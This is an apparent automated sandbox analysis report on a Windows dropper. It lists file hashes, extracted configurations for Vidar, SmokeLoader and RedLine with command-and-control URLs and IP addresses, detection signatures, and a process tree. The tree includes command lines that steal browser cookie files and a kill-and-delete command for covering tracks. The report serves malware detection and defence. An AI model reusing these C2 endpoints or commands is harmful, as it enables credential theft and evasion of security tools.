Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    125s
  • max time network
    1809s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    01-08-2021 19:11

General

  • Target

    8 (23).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

abobi isid

C2

209.250.247.73:64156

Extracted

Family

redline

Botnet

5k_BLACK_HOLE

C2

45.14.49.117:14251

Extracted

Family

redline

Botnet

youngboy

C2

176.57.69.178:59510

Extracted

Family

vidar

Version

39.8

Botnet

937

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In
  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 3 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 36 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 9 IoCs
  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 12 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies data under HKEY_USERS 5 IoCs
  • Modifies registry class 20 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    1⤵
      PID:1352
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2856
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2804
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2796
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
              PID:2540
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
              1⤵
                PID:2504
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1964
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1376
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1180
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                        PID:1172
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                        1⤵
                        • Drops file in System32 directory
                        PID:344
                        • C:\Users\Admin\AppData\Roaming\bgeeghf
                          C:\Users\Admin\AppData\Roaming\bgeeghf
                          2⤵
                            PID:2320
                          • C:\Users\Admin\AppData\Roaming\bgeeghf
                            C:\Users\Admin\AppData\Roaming\bgeeghf
                            2⤵
                              PID:5088
                            • C:\Users\Admin\AppData\Roaming\fseeghf
                              C:\Users\Admin\AppData\Roaming\fseeghf
                              2⤵
                                PID:4716
                                • C:\Users\Admin\AppData\Roaming\fseeghf
                                  C:\Users\Admin\AppData\Roaming\fseeghf
                                  3⤵
                                    PID:5924
                                • C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
                                  C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
                                  2⤵
                                    PID:5116
                                  • C:\Users\Admin\AppData\Roaming\bgeeghf
                                    C:\Users\Admin\AppData\Roaming\bgeeghf
                                    2⤵
                                      PID:1308
                                    • C:\Users\Admin\AppData\Roaming\fseeghf
                                      C:\Users\Admin\AppData\Roaming\fseeghf
                                      2⤵
                                        PID:4468
                                      • C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
                                        C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
                                        2⤵
                                          PID:4828
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                        1⤵
                                          PID:996
                                        • C:\Users\Admin\AppData\Local\Temp\8 (23).exe
                                          "C:\Users\Admin\AppData\Local\Temp\8 (23).exe"
                                          1⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1848
                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:2824
                                            • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\setup_install.exe
                                              "C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\setup_install.exe"
                                              3⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Suspicious use of WriteProcessMemory
                                              PID:2928
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:3208
                                                • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_1.exe
                                                  sonia_1.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3936
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1320
                                                • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_3.exe
                                                  sonia_3.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:3884
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 928
                                                    6⤵
                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                    • Program crash
                                                    PID:3676
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:1276
                                                • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_4.exe
                                                  sonia_4.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3604
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:2124
                                                • C:\Users\Admin\AppData\Local\Temp\7zS80BD9E14\sonia_5.exe
                                                  sonia_5.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:2568
                                                  • C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe
                                                    "C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of SetThreadContext
                                                    PID:5076
                                                    • C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe
                                                      C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:3252
                                                    • C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe
                                                      C:\Users\Admin\Documents\V0HG9NSaGhrXP6tgxIXM8sYu.exe
                                                      7⤵
                                                        PID:3588
                                                    • C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe
                                                      "C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:5064
                                                      • C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe
                                                        "C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe"
                                                        7⤵
                                                          PID:1072
                                                        • C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe
                                                          "C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe"
                                                          7⤵
                                                            PID:1604
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                              8⤵
                                                                PID:5964
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                  9⤵
                                                                    PID:5596
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5596.0.1369073039\1683534182" -parentBuildID 20200403170909 -prefsHandle 1520 -prefMapHandle 1504 -prefsLen 1 -prefMapSize 219680 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5596 "\\.\pipe\gecko-crash-server-pipe.5596" 1604 gpu
                                                                      10⤵
                                                                        PID:1716
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5596.3.1069437960\497894691" -childID 1 -isForBrowser -prefsHandle 5532 -prefMapHandle 5528 -prefsLen 543 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 5596 "\\.\pipe\gecko-crash-server-pipe.5596" 5544 tab
                                                                        10⤵
                                                                          PID:4716
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                      8⤵
                                                                        PID:4264
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x138,0x13c,0x140,0x134,0x144,0x7ffd5a554f50,0x7ffd5a554f60,0x7ffd5a554f70
                                                                          9⤵
                                                                            PID:4676
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1652 /prefetch:2
                                                                            9⤵
                                                                              PID:5316
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2204 /prefetch:8
                                                                              9⤵
                                                                                PID:3184
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1700 /prefetch:8
                                                                                9⤵
                                                                                  PID:5252
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:1
                                                                                  9⤵
                                                                                    PID:5768
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
                                                                                    9⤵
                                                                                      PID:5164
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                      9⤵
                                                                                        PID:5564
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3600 /prefetch:1
                                                                                        9⤵
                                                                                          PID:5704
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3660 /prefetch:1
                                                                                          9⤵
                                                                                            PID:5688
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                                                                                            9⤵
                                                                                              PID:5624
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 /prefetch:8
                                                                                              9⤵
                                                                                                PID:4556
                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                9⤵
                                                                                                  PID:5380
                                                                                                  • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff6d0b1a890,0x7ff6d0b1a8a0,0x7ff6d0b1a8b0
                                                                                                    10⤵
                                                                                                      PID:4436
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
                                                                                                    9⤵
                                                                                                      PID:5580
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4032 /prefetch:8
                                                                                                      9⤵
                                                                                                        PID:5964
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2136 /prefetch:8
                                                                                                        9⤵
                                                                                                          PID:4408
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,9595058349735723404,11142759266977786674,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=964 /prefetch:2
                                                                                                          9⤵
                                                                                                            PID:1136
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /C taskkill /F /PID 1604 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe"
                                                                                                          8⤵
                                                                                                            PID:4948
                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                              taskkill /F /PID 1604
                                                                                                              9⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:4116
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /C taskkill /F /PID 1604 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\elK7nEGhjLJ1wd4qibpnbjxw.exe"
                                                                                                            8⤵
                                                                                                              PID:5088
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /F /PID 1604
                                                                                                                9⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:3724
                                                                                                        • C:\Users\Admin\Documents\SGJNyxPMBKWS9cdNmrZOreM7.exe
                                                                                                          "C:\Users\Admin\Documents\SGJNyxPMBKWS9cdNmrZOreM7.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5052
                                                                                                        • C:\Users\Admin\Documents\lys5D1ETD5u3J4qhtfkTKC3d.exe
                                                                                                          "C:\Users\Admin\Documents\lys5D1ETD5u3J4qhtfkTKC3d.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5040
                                                                                                        • C:\Users\Admin\Documents\spRDxIOMMsvuaJ8Ert4U8YaP.exe
                                                                                                          "C:\Users\Admin\Documents\spRDxIOMMsvuaJ8Ert4U8YaP.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:2676
                                                                                                        • C:\Users\Admin\Documents\EMjKJUvbVBi3RSuaVhBOm4MC.exe
                                                                                                          "C:\Users\Admin\Documents\EMjKJUvbVBi3RSuaVhBOm4MC.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:2152
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 660
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Program crash
                                                                                                            PID:2192
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 676
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4376
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 680
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4708
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 596
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4304
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2152 -s 764
                                                                                                            7⤵
                                                                                                            • Program crash
                                                                                                            PID:4984
                                                                                                        • C:\Users\Admin\Documents\_rYjlAuHXiITEIOdQAYI25M2.exe
                                                                                                          "C:\Users\Admin\Documents\_rYjlAuHXiITEIOdQAYI25M2.exe"
                                                                                                          6⤵
                                                                                                            PID:4216
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                              7⤵
                                                                                                                PID:5168
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                  8⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:5556
                                                                                                            • C:\Users\Admin\Documents\qjFiKAQqvhoatmPBr5HYblrW.exe
                                                                                                              "C:\Users\Admin\Documents\qjFiKAQqvhoatmPBr5HYblrW.exe"
                                                                                                              6⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:1296
                                                                                                              • C:\Users\Admin\Documents\qjFiKAQqvhoatmPBr5HYblrW.exe
                                                                                                                "C:\Users\Admin\Documents\qjFiKAQqvhoatmPBr5HYblrW.exe"
                                                                                                                7⤵
                                                                                                                  PID:4312
                                                                                                              • C:\Users\Admin\Documents\1Ujr7SlLCQ4XJJy8eHtkdv3J.exe
                                                                                                                "C:\Users\Admin\Documents\1Ujr7SlLCQ4XJJy8eHtkdv3J.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:3684
                                                                                                                • C:\Users\Admin\Documents\1Ujr7SlLCQ4XJJy8eHtkdv3J.exe
                                                                                                                  C:\Users\Admin\Documents\1Ujr7SlLCQ4XJJy8eHtkdv3J.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2176
                                                                                                              • C:\Users\Admin\Documents\PkOzg4zZdENmIZiWhak1i0JW.exe
                                                                                                                "C:\Users\Admin\Documents\PkOzg4zZdENmIZiWhak1i0JW.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:5112
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  7⤵
                                                                                                                    PID:4724
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                    7⤵
                                                                                                                      PID:5260
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      7⤵
                                                                                                                        PID:5428
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        7⤵
                                                                                                                          PID:5756
                                                                                                                      • C:\Users\Admin\Documents\Z6F7QWO4rPBZmjfYoCbE3WJR.exe
                                                                                                                        "C:\Users\Admin\Documents\Z6F7QWO4rPBZmjfYoCbE3WJR.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5096
                                                                                                                      • C:\Users\Admin\Documents\SyDVWoGFzZ3VbtVrKeuhvyHX.exe
                                                                                                                        "C:\Users\Admin\Documents\SyDVWoGFzZ3VbtVrKeuhvyHX.exe"
                                                                                                                        6⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:4296
